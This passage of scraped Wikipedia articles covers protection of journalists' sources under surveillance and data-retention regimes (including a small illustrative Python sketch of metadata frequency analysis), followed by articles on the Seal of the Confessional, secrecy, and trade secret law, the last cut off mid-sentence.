reporting that involves gathering opinions in the streets, or a background briefing, often relies on trust that a journalist respects confidentiality where this is requested.[3] Due to the centrality of communication between journalists and sources to the daily business of journalism, the question of whether or not sources can expect to have their identity protected has significant effects on the ability of media to operate and investigate cases.[4] If a potential source can expect to face legal retaliation or other personal harm as a result of talking to a journalist, they may be less willing to talk to the media.[5] The digital environment poses challenges to traditional legal protections for journalists' sources. While protective laws and/or a reporter's commitment shielded the identity of sources in the analogue past, in the age of digital reporting, mass surveillance, mandatory data retention, and disclosure by third-party intermediaries, this traditional shield can be penetrated.[3] Technological developments and a change in the operational methods of police and intelligence services are redefining the legal classification of privacy and journalistic privilege internationally.[6] With rapid technological advancement, law enforcement and national security agencies have shifted from a process of detecting crimes already committed to one of threat prevention in the post-September 11 environment.
In the digital age, it is not the act of committing (or suspicion of committing) a crime that may result in a person being subject to surveillance, but the simple act of using certain modes of communication—such as mobile technology, email, social networks and the Internet.[6][7] Journalists are now adapting their work in an effort to shield their sources from exposure, sometimes even seeking to avoid electronic devices and communications. The cost of the digital-era threat to source protection is significant—in terms of digital security tools, training, reversion to more labor-intensive analogue practices, and legal advice. Such tactics may be insufficient if legal protections are weak, anonymity is forbidden, encryption is disallowed, and sources themselves are unaware of the risks. The impact of these combined factors on the production and scope of investigative journalism based on confidential sources is significant. Where source protection is compromised, the impacts can include: Scholars,[8] journalism organizations[9] and press freedom advocacy groups[10] have devoted considerable effort to defining journalism in a way that allows the best possible protection of journalists themselves and their sources. Many stakeholders have argued in favor of legal protections being defined in connection with 'acts of journalism', rather than through the definition of the professional functions of a journalist. Some countries are broadening the legal definition of 'journalist' to ensure adequate protection for citizen reporters (working on and offline). This opens up debates about classifying journalists, and even about licensing and registering those who do journalism—debates that are particularly potent where there is a history of controls over press freedom. Many legal definitions of 'journalist' have been evaluated as overly narrow, as they tend to emphasize official contractual ties to legacy media organizations, may demand a substantial publication record, and/or require significant income to be derived from the practice of journalism. This leaves confidential sources relied upon by bloggers and citizen journalists largely unprotected, because these producers of journalism are not recognized as 'proper journalists'. Such definitions also exclude the growing group of academic writers and journalism students, lawyers, human rights workers and others who produce journalism online, including investigative journalism.
This has bearing on a controversy in 2015 in which Amnesty International objected to having been a subject of surveillance.[11] In December 2013, the United Nations General Assembly adopted a resolution which outlined a broad definition of journalistic actors, acknowledging that: "...journalism is continuously evolving to include inputs from media institutions, private individuals and a range of organizations that seek, receive and impart information and ideas of all kinds, online as well as offline, in the exercise of freedom of opinion and expression".[12] In 2014, the Intergovernmental Council of UNESCO's International Program for the Development of Communications (IPDC) welcomed the UNESCO Director-General's Report on the Safety of Journalists and the Danger of Impunity, which uses the term 'journalists' to designate the range of "journalists, media workers and social media producers who generate a significant amount of public-interest journalism".[13] The Arabic Media Internet Network's Daoud Kuttab does not want to limit entitlement to source protection to recognized journalists, but to extend it to citizens as well.[14] Egyptian media studies professor Rasha Abdullah said that source protection needs to be accessible to a broad range of communications actors: "It should apply to anyone who has information to expose, particularly in the age of digital media".[15] For Arab Reporters for Investigative Journalism's (ARIJ) Rana Sabbagh, "There is a difference between reporting the news, writing an editorial, and being an activist".[16] United States media lawyer Charles Tobin is also in favor of a broad definition of journalism as a response to the rise of citizen journalists and bloggers.[17] In 2013, the USA's Society of Professional Journalists passed a unanimous motion that "strongly rejects any attempts to define a journalist in any way other than as someone who commits acts of journalism."[9] Moving the framework to a protection of 'acts of journalism', rather than limiting it to the work of professional journalists, is a conceptual shift, according to Stearns in a 2013 report.[10] In 2007, Banisar noted that: "A major recent concern ... is the adoption of new anti-terrorism laws that allow for access to records and oblige assistance. There are also problems in many countries with searches of newsrooms and with broadly defined state secrets acts which criminalize journalists who publish leaked information".[18] The problem has grown in the intervening years, in parallel with digital development, and occurs where it is unchecked by measures designed to preserve fundamental rights to freedom of expression and privacy, as well as accountability and transparency.
In practice, Campbell considers that this leads to what can be identified as a 'trumping effect', where national security and anti-terrorism legislation effectively take precedence over legal and normative protections for confidential journalistic sources.[19] The classification of information as being protected by national security or anti-terrorism legislation has the effect of increasing the reluctance of sources to come forward.[3] A 2008 Council of Europe (CoE) report stated: "Terrorism is often used as a talisman to justify stifling dissenting voices in the way that calling someone a communist or capitalist were used during the Cold War".[7] According to the CoE report, following the 2001 terrorist attacks, many European countries adopted new laws or expanded the use of old laws to monitor communications.[20] Gillian Phillips, Director of Editorial Legal Services of The Guardian, has specifically referenced the implications of governments invoking national security and anti-terrorism measures that interfere with protections for journalists and their sources. Calls for unlimited monitoring and the use of modern surveillance technologies to access all citizens' data directly challenge journalists' rights to protect their confidential sources, she said.[21] A report by The Guardian in 2015, based on files leaked by Edward Snowden, highlighted the potential controversy in this area. It stated that a United Kingdom Government Communications Headquarters (GCHQ) information security assessment had listed "investigative journalists" alongside terrorists and hackers in a threat hierarchy.[22] Fuchs,[23] Eubanks,[24] and Giroux[25] have warned that surveillance is a broader problem than the impingement of individual privacy. Andrejevic (2014) has argued that it represents a fundamental alteration to the power dynamics of society: "...Surveillance should be understood as referring to forms of monitoring deeply embedded in structural conditions of asymmetrical power relations that underwrite domination and exploitation."[26] Mass surveillance can be defined as the broad, arbitrary monitoring of an entire population or a substantial fraction of it.[27] According to the former United Nations Special Rapporteur on the Promotion and Protection of the Right to Freedom of Expression and Opinion, Frank La Rue, States can achieve almost complete control of telecommunications and online communications "...by placing taps on the fiber-optic cables, through which the majority of digital communication information flows, and applying word, voice and speech recognition...".[28] A report of the United Nations Special Rapporteur on the Promotion and Protection of Human Rights and Fundamental Freedoms while Countering Terrorism, Ben Emmerson, has outlined that States can gain access to the telephone and email content of an effectively unlimited number of users and maintain an overview of Internet activity associated with particular websites. "All of this is possible without any prior suspicion related to a specific individual or organization.
The communications of literally every Internet user are potentially open for inspection by intelligence and law enforcement agencies in the States concerned".[29] There is also concern about the extent of targeted surveillance, according to Emmerson's report: "Targeted surveillance ... enables intelligence and law enforcement agencies to monitor the online activity of particular individuals, to penetrate databases and cloud facilities, and to capture the information stored on them".[29] In 2013, the Munk School of Global Affairs' Citizen Lab research group at the University of Toronto discovered command and control servers for FinFisher software (also known as FinSpy) backdoors in a total of 25 countries, including 14 countries in Asia, nine in Europe and North America, one in Latin America and the Caribbean, and one in Africa.[30] This software is sold exclusively to governments and law enforcement agencies.[31] A 2008 Council of Europe report detailed what it described as a "worrying trend in the use of both authorized and unauthorized electronic surveillance to monitor journalists by governments and private parties to track their activities and identify their sources". According to the report, most such incidents are not related to countering terrorism but are authorized under the broad powers of national laws or undertaken illegally, in an attempt to identify the sources of journalistic information.[7] These laws expand surveillance in a number of ways, according to the CoE study, such as: According to Polish law academic Jan Podkowik (2014), surveillance undertaken without a journalist's consent should be considered an act of interference with the protection granted by Article 10 of the European Convention on Human Rights. He proposed in a 2014 paper that interference with journalistic confidentiality by means of secret surveillance should be recognized as at least as onerous as searches of a home or a workplace. "... it seems that in the digital era, it is necessary to redefine the scope of the protection of journalistic privilege and to include in that scope all the data acquired in the process of communication, preparation, processing or gathering of information that would enable the identification of an informant," Podkowik wrote.[32] Compounding the impacts of surveillance on source protection and confidential-source-dependent journalism globally is the interception, capture and long-term storage of data by third-party intermediaries. If ISPs, search engines, telecommunication technologies, and social media platforms, for example, can be compelled to produce electronic records (stored for increasingly lengthy periods under mandatory data retention laws) that identify journalists' sources, then legal protections that shield journalists from disclosing confidential sources may be undercut by backdoor access to the data.[33] A 2014 United Nations Office of the High Commissioner for Human Rights report, The Right to Privacy in the Digital Age, concludes that there is a pattern of "...increasing reliance of Governments on private sector actors to retain data 'just in case' it is needed for government purposes.
Mandatory third-party data retention—a recurring feature of surveillance regimes in many States, where Governments require telephone companies and internet service providers to store metadata about their customers' communications and location for subsequent law enforcement and intelligence agency access—appears neither necessary nor proportionate".[34] States are introducing mandatory data retention laws. Such laws require telecommunications companies and Internet service providers to preserve communications data for inspection and analysis, according to a report of the Special Rapporteur on the Promotion and Protection of Human Rights and Fundamental Freedoms while Countering Terrorism.[29] In practice, this means that data on individuals' telecommunication and Internet transactions are collected and stored even when no suspicion of crime has been raised.[35] Some of the data collected under these policies is known as metadata. Metadata is data that defines and describes other data; the International Organization for Standardization standard likewise defines metadata as data that defines and describes other data and processes.[36] As the Electronic Frontier Foundation's Peter Eckersley has put it, "Metadata is information about what communications you send and receive, who you talk to, where you are when you talk to them, the length of your conversations, what kind of device you were using and potentially other information, like the subject line of your emails".[37] Metadata may also include geolocation information. Advocates of long-term metadata retention insist that there are no significant privacy or freedom of expression threats.[38] Yet even when journalists encrypt the content, they may neglect the metadata, meaning they still leave behind a digital trail when they communicate with their sources. This data can easily identify a source (the sketch following this passage illustrates how), and safeguards against its illegitimate use are frequently limited, or non-existent.[39] In an era where citizens and other social communicators have the capacity to publish directly to their own audiences, and those sharing information in the public interest are recognized as legitimate journalistic actors by the United Nations, the question, for Julie Posetti, is to whom source protection laws should apply. On the one hand, broadening the legal definition of 'journalist' to ensure adequate protection for citizen reporters (working on and offline) is desirable, and case law is gradually catching up on this issue of redefinition. On the other hand, it opens up debates about licensing and registering those who do journalism and who wish to be recognized for protection of their sources.[3] Female journalists working in the context of reporting conflict and organized crime are particularly vulnerable to physical attacks, including sexual assault, and harassment. In some contexts, their physical mobility may be restricted due to overt threats to their safety, or as a result of cultural prohibitions on women's conduct in public, including meeting privately with male sources. For the World Trends Report, women journalists need to be able to rely on secure non-physical means of communication with their sources. Women sources may face the same physical risks outlined above—especially if their journalistic contact is male and/or they experience cultural restrictions, or they are working in conflict zones.
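The sketch referenced above is a minimal, self-contained Python illustration of the metadata point. All records, names and timestamps here are invented for illustration; this is not drawn from any real retention system or dataset. It shows how simple frequency analysis over retained call records can single out a journalist's likely source without any access to message content:

```python
# Minimal illustration: retained communications metadata alone can point to a
# source. Every record below is fabricated for this example.
from collections import Counter

# Hypothetical retained call-detail records: (caller, callee, timestamp).
# Note that no message content appears anywhere in this data.
call_records = [
    ("journalist", "press_office", "2015-03-01T09:12"),
    ("journalist", "official_B",   "2015-03-02T22:47"),
    ("journalist", "official_B",   "2015-03-03T23:05"),
    ("journalist", "official_B",   "2015-03-04T22:58"),
    ("journalist", "colleague",    "2015-03-04T10:00"),
]

# Count how often the journalist contacted each party; repeated late-night
# calls to one official stand out even though every call was "content-free".
contacts = Counter(callee for caller, callee, _ in call_records
                   if caller == "journalist")
likely_source, n_calls = contacts.most_common(1)[0]
print(f"Most-contacted party: {likely_source} ({n_calls} calls)")
# Prints: Most-contacted party: official_B (3 calls)
```

Real traffic analysis is far more sophisticated, correlating timing, location and device data across datasets, which is precisely why encrypting content alone does not protect a source's identity.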
Additionally, female confidential sources who are domestic abuse victims may be physically unable to leave their homes, and therefore be reliant on digital communications.[40][3] Women journalists need to be able to rely on secure digital communications to ensure that they are not at increased risk in conflict zones, or when working on dangerous stories, such as those about corruption and crime. The ability to covertly intercept and analyze journalistic communications with sources increases the physical risk to both women journalists and their sources in such contexts. Encrypted communications and other defensive measures are therefore of great importance to ensure that their movements are not tracked and the identity of the source remains confidential.[3] Journalists and sources using the Internet or mobile apps to communicate face greater risk of gendered harassment and threats of violence. These risks need to be understood and mitigated to avoid further chilling women's involvement in journalism—as practitioners or sources.[3] "There is widespread recognition in international agreements, case law and declarations that protection of journalists' sources [is] a crucial aspect of freedom of expression that should be protected by all nations".[18] International organizations such as the United Nations (UN), UNESCO, the Organisation of American States, the African Union, the Council of Europe, and the Organization for Security and Co-operation in Europe (OSCE) have specifically recognized journalists' right to protect their sources. The European Court of Human Rights (ECtHR) has found in several cases that it is an essential component of freedom of expression. An April 2013 draft report, "CleanGovBiz Integrity in Practice, Investigative Media", argued that forcing a journalist to reveal a source would in many cases be a short-sighted approach: "...once a corruption case has been brought to light by a journalist, law enforcement has an incentive to discover the anonymous source(s). While the source might indeed be valuable for the case in question, either by providing additional information or through being a witness in court, forcing the journalist to reveal the source would often be short-sighted."[59] In Africa, the African Commission on Human and Peoples' Rights has adopted a Declaration of Principles on Freedom of Expression in Africa which includes a right to protection of sources under Principle XV.[60] In Africa there exists a relatively strong recognition of the right of journalists to protect their sources, at national, sub-regional and continental levels. By and large, however, this recognition has not yet resulted in a critical mass of legal provisions. Article 9 of the African Charter of Human Rights gives every person the right to receive information and to express and disseminate opinions.
The 2002 Declaration of Principles on Freedom of Expression in Africa, released by the African Commission on Human and Peoples' Rights, provided guidelines for member states of the African Union on protection of sources: "XV Protection of Sources and other journalistic material: Media practitioners shall not be required to reveal confidential sources of information or to disclose other material held for journalistic purposes except in accordance with the following principles: Noteworthy developments since 2007: The Association of Southeast Asian Nations (ASEAN) adopted a Human Rights Declaration in November 2012 with general provisions for freedom of expression and privacy (ASEAN 2012).[64] Reservations have been voiced regarding the wording of provisions on human rights and fundamental freedoms in relation to political, economic and cultural systems, the Declaration's provisions on "balancing" rights with individual duties, and the absence of a reference that legitimate restrictions of rights must be provided by law and conform to strict tests of necessity and proportionality.[65][66][67] In 2007, Banisar noted that: "A major recent concern in the region is the adoption of new anti-terrorism laws that allow for access to records and oblige assistance. There are also problems in many countries with searches of newsrooms and with broadly defined state secrets acts which criminalize journalists who publish leaked information".[18] In Europe, the European Court of Human Rights stated in the 1996 case of Goodwin v. United Kingdom that "[p]rotection of journalistic sources is one of the basic conditions for press freedom ... Without such protection, sources may be deterred from assisting the press in informing the public on matters of public interest. As a result the vital public-watchdog role of the press may be undermined and the ability of the press to provide accurate and reliable information may be adversely affected."[68] The Court concluded that absent "an overriding requirement in the public interest", an order to disclose sources would violate the guarantee of free expression in Article 10[69] of the European Convention on Human Rights. In the wake of Goodwin, the Council of Europe's Committee of Ministers issued a Recommendation to its member states on how to implement the protection of sources in their domestic legislation.[70] The Organization for Security and Co-operation in Europe has also called on states to respect the right.[71] "The recognition of protection of journalistic sources is fairly well established in Europe both at the regional and domestic levels. For the most part, the protections seem to be respected by authorities ... and direct demands to [expose] sources seem more the exception than the common practice". Banisar noted: "...There are still significant problems. Many of the national laws are limited in scope, or in the types of journalists that they protect. The protections are being bypassed in many countries by the use of searches of newsrooms and through increasing use of surveillance. There has also been an increase in the use of criminal sanctions against journalists, especially under national security grounds for receiving information from sources." Since then, European organizations and law-making bodies have made significant attempts at a regional level to identify the risks posed to source protection in the changing digital environment, and to mitigate these risks.
In Bulgaria, Poland, and Romania, unauthorized access to information by government entities was identified in several cases.[85]In those political regions, policies such as mandatory registration of pre-paid SIM mobile phone cards and government access toCCTVmake hacking and surveillance considerably easier. In the Netherlands, a 2006 ruling held that a minimal national security interest does not supersede source confidentiality. The case concerned Bart Mos and Joost de Haas of the Dutch dailyDe Telegraaf. In an article in January 2006, the two journalists alleged the existence of aleakin theDutch secret servicesand quoted from what they claimed was an official dossier on Mink Kok, a notorious criminal. They further alleged that the dossier in question had fallen into the hands of Kok himself. A subsequent police investigation led to theprosecutionof Paul H., an agent accused of selling the file in question. Upon motions by the prosecution and the defence, the investigative judge in the case ordered the disclosure of the source for the news story, on the grounds that it was necessary to safeguardnational securityand ensure afair trialfor H. The two journalists were subsequently detained for refusing to comply with the disclosure order, but were released onappealafter three days, on November 30. The Haguedistrict court considered that the national security interest served by the order was minor and should not prevail over the protection of sources.[86] In the Americas, protection of sources has been recognized in theInter-American Declaration of Principles on Freedom of Expression,[87]which states in Principle 8 that "every social communicator has the right to keep his/her source of information, notes, personal and professional archives confidential." In theUnited States, unlikedoctor-patientorlawyer-clientconfidentiality, reporters are not afforded a similar legal shield. Communications between reporters and sources have been used by theFBIand otherlaw enforcement agenciesas an avenue to information about specific individuals or groups related to pendingcriminal investigations.[88] In the 1971 case ofBranzburg v. Hayes, the court ruled that reporter's privilege was not guaranteed by theFirst Amendment, but the publicity surrounding the case helped introduce the concept of reporter's privilege into public discussion. As a result of the case, Branzburg, a Kentucky reporter, was forced to testify about his sources and story to a grand jury.[3] AUniversity of Montanastudent, Linda Tracy, was issued asubpoenafor video she took of a violent encounter between police officers and a group of residents.[when?]The case, which was ultimately dismissed, involved obtaining unedited footage of the encounter, part of which was used in a documentary Tracy made for an undergraduate journalism class. Although she won the case, her status as a real journalist was called into question. Even with the victory, the court did not specifically address whether protections and privacy extended to student journalists, but because of the nature of her intent and the project she could not be coerced into releasing the footage.[89]The case helped further battles over student journalism and press freedoms at the educational level.[citation needed] TheElectronic Communications Privacy Act, passed in 1986, protects bank transactions, dialed telephone numbers, and other information. 
The act also specifies what organizations must provide to law enforcement with a subpoena, such as name, address, durations of services used, type of device used, and source of payment. These are known as "required disclosure" policies. The act was later amended to include provisions prohibiting access to stored electronic communications.[90] Former CIA employeeEdward Snowdenfurther impacted the relationship between journalism, sources, and privacy. Snowden's actions as awhistleblowerat theNational Security Agencydrew attention to the extent of US government surveillance operations.[91]Surveillance by network administrators may include being able to view how many times a journalist or source visits a website per day, the information they are reading or viewing, and the online applications they use. In Mexico, the government reportedly spent $300 million in a single year to surveil and gather information from the population, with specific interest in journalists, in order to gain access to their texts, phone calls, and emails.[92] Under Canadian law, journalists cannot be compelled to identify or disclose information likely to identify a journalistic source, unless a court of competent jurisdiction finds there is no other reasonable way to obtain the information in question, and that the public interest in administering justice in the case outweighs the public interest in source protection.[93] In 2019, theSupreme Court of Canadaoverturned an order that would have required a journalist to disclose the source of her reporting on theSponsorship scandal. Former cabinet ministerMarc-Yvan Côtéhad sought the order in a bid to have charges against him stayed, arguing that officials from an anti-corruption police unit had leaked information about the case to the press. The case was remitted back to theCourt of Quebecfor further consideration of new facts.[94] Newsrooms rely onend-to-end encryptiontechnologies to protect the confidentiality of their communications.[92]However, even these methods are not completely effective.[1] More schools of journalism are also beginning to include data and source protection and privacy in their curricula.[91] Technologies used to protect source privacy includeSecureDrop,[95]GlobaLeaks,[96]Off-the-Record Messaging, theTails operating system, andTor.[91] Banisar wrote: "There are important declarations from theOrganisation of American States(OAS). Few journalists are ever required to testify on the identity of their sources. However direct demands for sources still occur regularly in many countries, requiring journalists to seek legal recourse in courts. There are also problems with searches of newsrooms and journalists' homes, surveillance and the use of national security laws". In 1997, the Hemisphere Conference on Free Speech staged inMexico Cityadopted the Chapultepec Declaration. Principle 3 states: "No journalist may be forced to reveal his or her sources of information."[97]Building on the Chapultepec Declaration, in 2000 theInter-American Commission on Human Rights(IACHR) approved the Declaration of Principles on Freedom of Expression as a guidance document for interpreting Article 13 of the American Convention on Human Rights. Article 8 of the Declaration states: "Every social communicator has the right to keep his/her source of information, notes, personal and professional archives confidential."[98] There have been developments with regard to the status of the above regional instruments since 2007: This article incorporates text from afree contentwork. 
Licensed under CC BY SA 3.0 IGO (license statement/permission). Text taken fromProtecting Journalism Sources in the Digital Age, 193, Julie Posetti, UNESCO.
https://en.wikipedia.org/wiki/Protection_of_sources
TheSeal of the Confessional(alsoSeal of ConfessionorSacramental Seal) is aChristiandoctrine forbidding apriestfrom disclosing any information learned from a penitent duringConfession. This doctrine is recognized by severalChristian denominations:
https://en.wikipedia.org/wiki/Seal_of_the_Confessional_(disambiguation)
Secrecyis the practice of hiding information from certain individuals or groups who do not have the "need to know", perhaps while sharing it with other individuals. That which is kept hidden is known as the secret. Secrecy is often controversial, depending on the content or nature of the secret, the group or people keeping the secret, and the motivation for secrecy. Secrecy by government entities is often decried as excessive or in promotion of poor operation[by whom?]; excessive revelation of information on individuals can conflict with virtues ofprivacyandconfidentiality. It is often contrasted withsocial transparency. Secrecy can exist in a number of different ways: encoding orencryption(where mathematical and technical strategies are used to hide messages), true secrecy (where restrictions are put upon those who are privy to the message, such as throughgovernment security classification)[citation needed]andobfuscation, where secrets are hidden in plain sight behind complex idiosyncratic language (jargon) orsteganography. Another classification proposed byClaude Shannonin 1948 identifies three systems of secrecy within communication: concealment systems, privacy systems, and "true" secrecy systems.[1] Animalsconceal the location of theirdenornestfrompredators. Squirrels bury nuts, hiding them, and they try to remember their locations later.[2] Humansattempt to consciously conceal aspects of themselves from others due toshame, or fromfearof violence, rejection, harassment, loss ofacceptance, or loss ofemployment. Humans may also attempt to conceal aspects of their ownselfwhich they are not capable of incorporating psychologically into theirconsciousbeing.Familiessometimes maintain "family secrets", obliging family members never to discuss disagreeable issues concerning the family with outsiders or sometimes even within the family. Many "family secrets" are maintained by using a mutually agreed-upon construct (an official family story) when speaking with outside members. Agreement to maintain the secret is often coerced through "shaming" and reference to familyhonor. The information may even be something as trivial as arecipe.[citation needed] Secrets are sometimes kept to provide the pleasure of surprise. This includes keeping the secret of asurprise party, not tellingspoilersof a story, and avoidingexposureof a magic trick.[citation needed] Keeping one'sstrategysecret is important in many aspects ofgame theory.[citation needed] Inanthropology, secret sharing is one way for people to establish traditional relations with other people.[3]A commonly used[citation needed]narrative that describes this kind of behavior isJoseph Conrad's short story "The Secret Sharer".[citation needed] Governmentsoften attempt to conceal information from other governments and the public. These state secrets can includeweapondesigns, military plans,diplomaticnegotiationtactics, and secrets obtained illicitly from others ("intelligence"). Most nations have some form ofOfficial Secrets Act(theEspionage Actin the U.S.) and classify material according to the level of protection needed (hence the term "classified information"). An individual needs asecurity clearancefor access, and other protection methods, such as keeping documents in asafe, are stipulated.[4] Few people dispute the desirability of keepingCritical Nuclear Weapon Design Informationsecret, but many believe government secrecy to be excessive and too often employed for political purposes. 
Many countries have laws that attempt to limit government secrecy, such as the U.S.Freedom of Information Actandsunshine laws. Government officials sometimesleakinformation they are supposed to keep secret. (For a recent (2005) example, seePlame affair.)[5] Secrecy in elections is a growing issue, particularly secrecy of vote counts on computerized vote counting machines. While voting, citizens are acting in a unique sovereign or "owner" capacity (instead of being a subject of the laws, as is true outside of elections) in selecting their government servants. It is argued that secrecy is impermissible as against the public in the area of elections where the government gets all of its power and taxing authority. In any event, permissible secrecy varies significantly with the context involved.[citation needed] Organizations, ranging from multi-national for profitcorporationsto nonprofitcharities, keep secrets forcompetitive advantage, to meet legal requirements, or, in some cases, to conceal nefarious behavior.[citation needed]New products under development, unique manufacturing techniques, or simply lists of customers are types of information protected bytrade secretlaws. Research on corporate secrecy has studied the factors supporting secret organizations.[6]In particular, scholars in economics and management have paid attention to the way firms participating in cartels work together to maintain secrecy and conceal their activities from antitrust authorities.[7]The diversity of the participants (in terms of age and size of the firms) influences their ability to coordinate to avoid being detected. Thepatentsystem encourages inventors to publish information in exchange for a limited timemonopolyon its use, though patent applications are initially secret.Secret societiesuse secrecy as a way to attract members by creating a sense of importance.[citation needed] Shell companiesmay be used to launder money from criminal activity, to finance terrorism, or to evade taxes. Registers ofbeneficial ownershipaim at fighting corporate secrecy in that sense.[8] Other lawsrequireorganizations to keep certain information secret, such asmedical records(HIPAAin the U.S.), orfinancial reportsthat are under preparation (to limitinsider trading). Europe has particularly strict laws aboutdatabaseprivacy.[9] Preservation of secrets is one of the goals ofinformation security. Techniques used includephysical securityandcryptography. The latter depends on the secrecy ofcryptographic keys. Many believe that security technology can be more effective if it itself is not kept secret.[10] Information hidingis a design principle in muchsoftware engineering. It is considered easier to verify software reliability if one can be sure that different parts of the program can only access (and therefore depend on) a known limited amount of information.[citation needed] Military secrecy is the concealing of information about martial affairs that is purposely not made available to the general public and hence to any enemy, in order to gain an advantage or to not reveal a weakness, to avoidembarrassment, or to help inpropagandaefforts. Most military secrets are tactical in nature, such as the strengths and weaknesses ofweapon systems,tactics, training methods, plans, and the number and location of specific weapons. 
Some secrets involve information in broader areas, such as secure communications,cryptography, intelligence operations, and cooperation with third parties.[11] US Governmentrights in regard to military secrecy were upheld in thelandmark legal caseofUnited States v. Reynolds, decided by theSupreme Courtin 1953.[12] Excessive secrecy is often cited[13]as a source of much human conflict. One may have toliein order to hold a secret, which might lead topsychologicalrepercussions.[original research?]The alternative, declining to answer when asked something, may suggest the answer and may therefore not always be suitable for keeping a secret. Also, the other person may insist that one answer the question.[improper synthesis?] Nearly 2500 years ago,Sophocleswrote: 'Do nothing secretly; for Time sees and hears all things, and discloses all.'[citation needed]Gautama Siddharthasaid: "Three things cannot long stay hidden: thesun, themoonand thetruth."
https://en.wikipedia.org/wiki/Secrecy
Atrade secretis a form ofintellectual property(IP) comprising confidential information that is not generally known or readily ascertainable, derives economic value from its secrecy, and is protected by reasonable efforts to maintain its confidentiality.[1][2][3]Well-known examples include theCoca-Cola formulaand the recipe forKentucky Fried Chicken. Unlike other forms of IP, trade secrets do not require formal registration and can be protected indefinitely, as long as they remain undisclosed.[4]Instead,non-disclosure agreements(NDAs), among other measures, are commonly used to keep the information secret.[5][6] Like other IP assets, trade secrets may be sold or licensed.[7]Unauthorized acquisition, use, or disclosure of a trade secret by others in a manner contrary to honest commercial practices is considered misappropriation of the trade secret. If trade secretmisappropriationhappens, the trade secret holder can seek variouslegal remedies.[7] The precise definition of a trade secret varies byjurisdiction, as do the types of information eligible for trade secret protection. However, in general, trade secrets are confidential information that is: (1) not generally known or readily ascertainable, (2) commercially valuable because of its secrecy, and (3) subject to reasonable efforts to maintain its confidentiality. All three elements are required. If any element ceases to exist, then the trade secret will also cease to exist.[4] Trade secret protection covers confidential information, which can include technical and scientific data, business and commercial information, and financial records.[3]Even “negative” information, like failed experiments, can be valuable by helping companies avoid repeating costly mistakes.[3] In international law, while "trade secrets" and "confidential information" are often used interchangeably, trade secrets are technically a subset of confidential information.[8]To qualify as a trade secret, confidential information must meet the specific requirements set by a country's national laws, which are often influenced by Article 39 of theTRIPS Agreement.[8][9] Commentators likeA. Arthur Schillerhave argued that trade secrets were protected underRoman lawby a claim known asactio servi corrupti, meaning an "action for making a slave worse" or "an action for corrupting a servant." The Roman law is described as follows: [T]he Roman owner of a mark or firm name was legally protected against unfair usage by a competitor through theactio servi corrupti... which the Roman jurists used to grant commercial relief under the guise of private law actions. "If, as the writer believes [writes Schiller], various private cases of action were available in satisfying commercial needs, the state was acting in exactly the same fashion as it does at the present day."[10] The suggestion that trade secret law has its roots in Roman law was introduced in 1929 in aColumbia Law Reviewarticle called "Trade Secrets and the Roman Law: TheActio Servi Corrupti", which has been reproduced in Schiller'sAn American Experience in Roman Law1 (1971). However, theUniversity of Georgia Law SchoolprofessorAlan Watsonargued inTrade Secrets and Roman Law: The Myth Explodedthat theactio servi corruptiwas not used to protect trade secrets. Rather, he explained: Schiller is sadly mistaken as to what was going on. ... Theactio servi corruptipresumably or possibly could be used to protect trade secrets and other similar commercial interests. That was not its purpose and was, at most, an incidental spin-off. But there is not the slightest evidence that the action was ever so used. In this regard theactio servi corruptiis not unique. 
Exactly the same can be said of many private law actions including those for theft, damage to property, deposit, and production of property. All of these could, I suppose, be used to protect trade secrets, etc., but there is no evidence they were. It is bizarre to see any degree the Romanactio servi corruptias the counterpart of modern law for the protection of trade secrets and other such commercial interests.[10] Modern trade secret law is primarily rooted in Anglo-Americancommon law.[11](p6)The earliest recorded court case was the 1817 English caseNewbery v. James,which involved a secret formula for gout treatment.[12][11](p5)[13]In the United States, this concept was first recognized in the 1837 caseVickery v. Welch, involving the sale of a chocolate factory and the seller’s agreement to keep the secret recipe confidential.[14][15] NewberyandVickeryonly awarded compensation for losses (damages) and did not issue orders to prevent the misuse of secrets (injunctive relief).[11](p5)The first English case involving injunctive relief wasYovatt v. Winyardin 1820, where the court issued an injunction to prevent a former employee from using or disclosing recipes he had secretly copied from his employer's veterinary medicine practice.[16][17] In the United States, the 1868 Massachusetts Supreme Court decision inPeabody v. Norfolkis one of the most well-known and well-reasoned early trade secret cases, establishing foundational legal principles that continue to be central to common law.[18][19]In this case, the court ruled that Peabody’s confidential manufacturing process was a protectable trade secret and issued an injunction preventing former employees from using or disclosing it after they shared it with a competitor.[18] In 1939, theRestatement of Torts,published by theAmerican Law Institute, offered, among other things, one of the earliest formal definitions of a trade secret. According to Section 757, Comment b, a trade secret may consist of "any formula, pattern, device, or compilation of information which is used in one's business, and which gives the business an opportunity to obtain an advantage over competitors who do not know or use it."[20](p278)This definition became widely used by courts across the United States.[20](p278)As the first attempt to outline the accepted principles of trade secret law, theRestatementserved as the primary authority adopted in virtually every reported case.[20](p282) Trade secret law saw further development in 1979 when theUniform Law Commission(ULC) introduced a model law known as theUniform Trade Secrets Act(UTSA), which was later amended in 1985. The UTSA defines the types of information eligible for trade secret protection, establishes a private cause of action for misappropriation, and outlines remedies such as injunctions, damages, and, in certain cases, attorneys' fees.[21]It has since been adopted by 48 states, along with the District of Columbia, Puerto Rico, and the U.S. Virgin Islands, with New York and North Carolina as the exceptions.[22][23] The UTSA influenced theDefend Trade Secrets Act(DTSA) of 2016, which created a federal civilcause of actionfor trade secret misappropriation, allowing plaintiffs to file cases directly in federal courts if "the trade secret is related to a product or service used in ... 
interstate or foreign commerce."[23] Trade secret law is governed by national legal systems.[24]However, international standards for protecting secrets (called “undisclosed information”) were established as part of theTRIPS Agreementin 1995.[24]Article 39 of TRIPS obligates member countries to protect “undisclosed information” from unauthorized use conducted “in a manner contrary to honest commercial practices,” including actions such as breach of contract, breach of confidence, and unfair competition. For the information to qualify, it must not be generally known or easily accessible, must hold value due to its secrecy, and must be safeguarded through “reasonable steps” to keep it secret.[24][25] Trade secrets are an important but invisible component of a company'sintellectual property(IP). Their contribution to a company's value can be major.[26]Being invisible, that contribution is hard to measure.[27]Still, research shows that changes in trade secret laws affect business spending onR&Dandpatents.[28][29]This research provides indirect evidence of the value of trade secrecy. Unlike other forms ofintellectual property, trade secrets do not require formal registration and can be protected indefinitely, as long as they remain secret.[4]Maintaining secrecy is both a practical necessity and a legal obligation, as trade secret owners must take "reasonable" measures to protect the confidentiality of their trade secrets to qualify for legal protection.[30](p4)"Reasonable" efforts are decided case by case, considering factors like the type and value of the secret, its importance to the business, the company’s size, and its organizational complexity.[30](p4) The most common reason for trade secret disputes to arise is when former employees of trade secret-bearing companies leave to work for a competitor and are suspected of taking or using valuable confidential information belonging to their former employer.[31]Legal protections includenon-disclosure agreements(NDAs),work-for-hireclauses, andnon-compete clauses. In other words, in exchange for an opportunity to 